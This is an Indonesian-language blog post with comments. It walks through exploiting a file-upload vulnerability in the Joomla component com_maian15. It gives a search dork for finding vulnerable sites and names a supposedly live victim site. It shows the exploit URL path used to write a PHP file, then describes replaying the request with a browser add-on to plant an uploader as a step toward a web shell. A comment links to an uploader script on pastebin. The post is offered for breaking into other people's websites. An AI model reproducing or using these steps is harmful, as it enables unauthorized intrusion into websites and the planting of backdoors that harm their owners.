Menu
» » » Exploit Joomla component com_maian15 upload shell Vulnerability

peace

okedeh cekidot:
cari target dlu..

Dork: inurl:"option=com_maian15"
silahkan dikembangkan piss

disini ane kasih 1 live target..
http://www.akindeledecker.com/C2-LyricalOverflow/

exploit:
administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php

langsung inject om,..
http://www.akindeledecker.com/C2-Lyrical...cekson.php

NB: sebenarnya ntuh file udah terupload.. dgn nama file cekson.php tapi isi filenya gak ada hammer

lanjut,. kita gunakan live http header (add on moksilla hammer)
klik replay..


langsung parkir backdoor ketawa tapi disini ane gak langsung parkir backdoor hammer , ane cuma parkir uploader hmm
uploader dari om unyil malu


klik replay

dan walaaaa... shock
uploader ane sdh tertanam kalem
direktori file:
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php

Sekarang tinggal upload "the real shell" :P

sekian tutor cupu dari ane

Maaf trit nnya berantakan :ngakak malas edit T.T




mohon
Diposkan oleh
Label: ,
di 11:39 AM

3 komentar:

  1. AnonymousDecember 7, 2013 at 7:54 AM

    keren :o

    ReplyDelete
  2. UnknownDecember 8, 2013 at 8:47 PM

    gan , itu yang bagian replay , di isi apa ?? minta boleh gak ??

    ReplyDelete
    Replies
    1. HendraDecember 9, 2013 at 10:13 PM

      isi dgn script backdoor agan :)
      kalau mau upload uploader, silahkan pake script ini:

      http://pastebin.com/Hn4MEUyD

      Delete

Subscribe to: Post Comments (Atom)
 
Top